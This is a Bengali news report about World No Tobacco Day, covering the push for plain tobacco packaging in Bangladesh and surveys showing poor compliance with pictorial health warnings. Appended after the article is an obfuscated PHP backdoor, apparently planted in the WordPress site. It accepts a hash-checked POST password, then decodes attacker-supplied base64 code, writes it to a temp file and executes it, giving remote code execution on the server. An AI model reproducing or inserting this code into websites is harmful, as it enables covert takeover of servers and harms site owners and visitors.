সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

বিশ্ব তামাক মুক্ত দিবস আজ প্লেইন প্যাকেজিং দরকার বাংলাদেশে

 

নিজস্ব প্রতিবেদক : বিশ্ব তামাক মুক্ত দিবসআজ (৩১ মে) বিশ্ব তামাক মুক্ত দিবস। বিশ্ব স্বাস্থ্য সংস্থা ও এর সহযোগী সংস্থাগুলো বিভিন্ন দেশের সরকারকে প্লেইন প্যাকেজিং প্রবর্তনে প্রয়োজনীয় প্রস্তুতি নেওয়ার আহ্‌বান জানিয়ে বিশ্ব তামাক মুক্ত দিবস পালন করা হচ্ছে। এবারের প্রতিপাদ্য নির্ধারণ করা হয়েছে, ‘সাদামাটা মোড়ক-তামাক নিয়ন্ত্রণে আগামীর দিন’। বিশেষজ্ঞরা বলছেন, বিশ্বের অনেক দেশেই প্লেইন প্যাকেজিং বাস্তবায়ন করা হয়েছে, বাংলাদেশেও এর বাস্তবায়ন হওয়া দরকার।

NoSmoke20160531030720
উল্লেখ্য, ১৯৮৭ সাল থেকে প্রতিবছর ৩১ মে বিশ্ব স্বাস্থ্য সংস্থা ও এর সহযোগী সংস্থাসমূহের উদ্যোগে তামাকের স্বাস্থ্যঝুঁকিগুলো তুলে ধরে তামাক ব্যবহার প্রতিরোধে কার্যকর নীতিমালা প্রণয়নের লক্ষ্যে বিশ্বব্যাপী ‘বিশ্ব তামাক মুক্ত দিবস’ পালন করে আসছে।
তামাক নিয়ন্ত্রণের অন্যতম একটি পদক্ষেপ হিসেবে প্লেইন প্যাকেজিং-এর গুরুত্বকে তুলে ধরতেই এবার এই প্রতিপাদ্য নির্ধারণ করা হয়েছে। একইসঙ্গে প্লেইন প্যাকেজিং বাস্তবায়নের পূর্ববর্তী ধাপ হিসেবে প্যাকেজিং ও লেবেলিং সংক্রান্ত পদক্ষেপগুলো শক্তি-শালীকরণ ও প্রচার-প্রচারণা-পৃষ্ঠপোষকতা নিষিদ্ধকরণসহ প্রয়োজনীয় প্রস্তুতির ওপরও গুরুত্বারোপ করা হচ্ছে।
তামাকবিরোধী সংগঠন প্রজ্ঞা সূত্রে জানা গেছে, তামাকের ব্যবহার কমাতে প্লেইন প্যাকেজিংকে অত্যন্ত কার্যকর পদ্ধতি হিসেবে গণ্য করা হয়। কারণ এটি তামাকের প্যাকেট বা কৌটাকে তামাক ব্যবহারকারীর কাছে অনাকর্ষণীয় করে তোলে। এই পদ্ধতিতে তামাকপণ্যের প্যাকেট বা কৌটার গায়ে কোনও প্রচারণামূলক ও বিভ্রান্তিকর শব্দ ব্যবহারের সুযোগ থাকে না। যা ছবিযুক্ত স্বাস্থ্য সর্তকবাণীর কার্যকারিতা বৃদ্ধিতে গুরত্বপূর্ণ ভূমিকা পালন করে।প্লেইন প্যাকেজিংয়ে সব তামাকজাত পণ্যের প্যাকেট/কৌটার রঙ একই রকম হয়। সব প্যাকেট বা কৌটার আকার ও শলাকার সংখ্যা বা ওজন সমান থাকে। প্যাকেট/কৌটায় ছবিযুক্ত স্বাস্থ্য সতর্কবার্তা এবং তামাকের ক্ষতিকর উপাদান সংক্রান্ত তথ্য মুদ্রণ বাধ্যতামূলক। নির্দিষ্ট রং ও ফন্ট ব্যবহার করে পণ্যের নাম ও ব্র্যান্ড লিখতে হয়।কোম্পানির লোগো, রং কিংবা ব্র্যান্ড ছবি এবং কোন প্রকার প্রচারণামূলক তথ্য মুদ্রণ করা যায় না।

২০১৩ সালে অস্ট্রেলিয়ান ইনস্টিটিউট অব হেলথ্ অ্যান্ড ওয়েলফেয়ার কর্তৃক পরিচালিত এক গবেষণায় দেখা গেছে, ২০১২ সালে অস্ট্রেলিয়ায় প্লেইন প্যাকেজিং চালু হওয়ার এক বছর পর অর্থাৎ ২০১৩ সালে দৈনিক ধূমপায়ীর হার ১৫.১ শতাংশ থেকে ১২.৮ শতাংশে নেমে গেছে। অন্যদিকে প্লেইন প্যাকেজিং চালু হওয়ার পর সিগারেটের প্যাকেটের প্রতি আকর্ষণ কমে যায় বলেও জানা গেছে।উল্লেখ্য, প্লেইন প্যাকেজিং তামাকের অবৈধ বাণিজ্য উৎসাহিত করে বলে তামাক কোম্পানি যে অপপ্রচার চালায় সেবিষয়ে কোন তথ্য-প্রমাণ পাওয়া যায়নি বলেন প্রজ্ঞার নির্বাহী পরিচালক এবিএম জুবায়ের।
আন্তর্জাতিক চুক্তি ফ্রেমওয়ার্ক কনভেনশনঅন টোব্যাকো কন্ট্রোল (এফসিটিসি)-এর ১১ ও ১৩ ধারায় প্লেইন প্যাকেজিং প্রথা বাস্তবায়নের কথা বলা হয় এবং ২০১২ সালে প্রথম অস্ট্রেলিয়াতে এই পদ্ধতি চালু হয়। চলতি বছর থেকে যুক্তরাজ্য ও ফ্রান্স প্লেইন প্যাকেজিং বাস্তবায়ন শুরু করেছে।এছাড়াও আয়ারল্যান্ড, নরওয়ে, হাঙ্গেরি, সুইডেন, ফিনল্যান্ড, কানাডা, নিউজিল্যান্ড, সিঙ্গাপুর, তুরস্ক ও দক্ষিন আফ্রিকা প্লেইন প্যাকেজিং প্রবর্তন করছতামাকপণ্যে সচিত্র স্বাস্থ্য সতর্কবানী বাস্তবায়ন প্লেইন প্যাকেজিং প্রবর্তনের অন্যতম প্রধান ধাপ।বাংলাদেশেও চলতি বছরের ১৯ মার্চ থেকে সকল তামাকপণ্যের মোড়কে উপরের ৫০ শতাংশ জায়গা জুড়ে সচিত্র স্বাস্থ্য সতর্কবাণী বাস্তবায়ন বাধ্যতামূলক করা হলেও তামাক বিরোধী সংগঠনসমূহের জরিপে দেখা গেছে, প্রায় ৭৫ শতাংশ তামাকপণ্যই সচিত্র স্বাস্থ্য সতর্কবাণী ছাড়া বাজারজাত করা হচ্ছে।গবেষণায় প্রাপ্ত ১৪ ব্রান্ডের ৮৮টি বিড়ির প্যাকেটে সচিত্র স্বাস্থ্য সর্তকবাণীর উপস্থিতি শূন্য শতাংশ। ৩৫টি ব্রান্ডের ৭০০টি সিগারেট প্যাকেটের মধ্যে ৫৫.৩% প্যাকেটেই সচিত্র স্বাস্থ্য সতর্কবাণী পাওয়া যায়নি। ৪৪.৭ শতাংশ সিগারেট প্যাকেটে সচিত্র স্বাস্থ্য সর্তকবাণী পাওয়া গেলেও তা আইন মেনে মুদ্রণ করা হয়নি (উপরের ৫০% এর পরিবর্তে নিচের ৫০% এ)।৬টি সিগারেট উৎপাদনকারী প্রতিষ্ঠানের মধ্যে ৪টিই সচিত্র সতর্কবাণী ছাড়া সিগারেট বাজারজাত করছে।জর্দায় ৯১.৬ শতাংশ এবং গুলের ক্ষেত্রে ৮৭.৯ শতাংশ কৌটাতেই সচিত্র স্বাস্থ্য সতর্কবাণী পাওয়া যায়নি। গবেষণায় প্রাপ্ত ১০০টি জর্দা কারখানার মধ্যে মাত্র ১৪টি সচিত্র সতর্কবাণীসহ জর্দা বাজারজাত করছে। একইভাবে ১৩টি গুল কারখানার মধ্যে মাত্র ১টি কারখানা সচিত্র সতর্কবাণীসহ গুল বাজারজাত করছে। সামগ্রিকভাবে সচিত্র সতর্কবাণী বাস্তবায়নের হার উদ্বেগজনক। কাজেই প্লেইন প্যাকেজিং প্রথা প্রবর্তনে বাংলাদেশকে এখনও অনেকটা পথ পাড়ি দিতে হবে বলেন এবিএম জুবায়ের।
এদিকে, বাংলাদেশে সচিত্র স্বাস্থ্য সতর্কবার্তা হয়ে গেছে এটি একটি ভালো দিক। কিন্তু এর পূর্ণ বাস্তবায়ন এখনও হয়নি, তাই এর পুরো বাস্তবায়ন নিশ্চিত করতে হবে বাংলা ট্রিবিউনকে জানালেন বিশ্ব স্বাস্থ্য সংস্থার টেকনিক্যাল অফিসার ডা. মাহফুজুল হক। তিনি আরও বলেন, এখন পর্যন্ত উন্নত বিশ্বের কয়েকটা দেশে প্লেইন প্যাকেজিং শুরু হয়েছে এবং আরও দেশগুলোতে ধীরে ধীরে চালু করতে যাচ্ছে। আমরা আশা করি, দক্ষিণ পূর্ব এশিয়াতে বাংলাদেশ হবে প্রথম দেশ, যে দেশটি প্লেইন প্যাকেজিং ব্যবস্থা চালু করবে।

এদিকে, তামাক নিয়ন্ত্রণ সেলের সমন্বয়কারী ও স্বাস্থ্য মন্ত্রণালয়ের যুগ্মসচিব রুহুল কুদ্দুস বলেন, স্বাস্থ্য মন্ত্রণালয় থেকে আগামী ৩১ মে জাতীয় দৈনিক পত্রিকাগুলোয় বিভৎস ছবি দিয়ে সচিত্র স্বাস্থ্য সতর্কবাণী দেওয়া হবে মানুষকে তামাকের ভয়াবহতা বোঝাতে। এর মাধ্যমে তামাকের ভয়াবহতা সম্পর্কে মানুষ আরও জানতে পারবে।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}